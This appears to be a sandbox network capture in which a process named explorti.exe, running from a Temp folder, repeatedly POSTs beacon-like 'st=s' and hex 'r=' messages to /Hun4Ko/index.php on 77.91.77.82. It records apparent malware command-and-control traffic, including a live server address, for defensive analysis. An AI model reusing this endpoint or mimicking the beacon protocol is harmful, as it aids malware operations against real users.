Jul 3, 2024 18:09:31.350742102 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:31.351476908 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:31.573431969 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	62948	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:31.694041967 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:32.384043932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:32.384742975 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:32.598854065 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	62949	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:32.720395088 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:33.420182943 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:33.420981884 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:33.646411896 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	62950	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:33.773287058 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:35.169857979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:35.170613050 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:35.170831919 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:35.173105001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:35.397423029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	62951	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:35.516750097 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:36.207905054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:36.208854914 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:36.422951937 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	62952	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:36.533454895 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:37.238859892 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:37.239566088 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:37.458806992 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	62953	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:37.582690954 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:38.279793978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:38.280626059 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:38.502810955 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	62954	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:38.610898972 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:39.299514055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:39.302880049 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:39.521378040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	62955	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:39.642170906 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:40.352895975 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:40.354044914 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:40.657865047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	62956	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:40.767302990 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:41.462383986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:41.463291883 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:41.698949099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	62957	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:41.813736916 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:42.552440882 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:42.553288937 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:42.775460958 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	62958	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:42.891916037 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:43.580265045 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 3, 2024 18:09:43.581374884 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 3, 2024 18:09:43.800369024 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	62959	77.91.77.82	80	4616	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 18:09:43.907795906 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 3, 2024 18:09:44.607295990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 03 Jul 2024 16:09:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
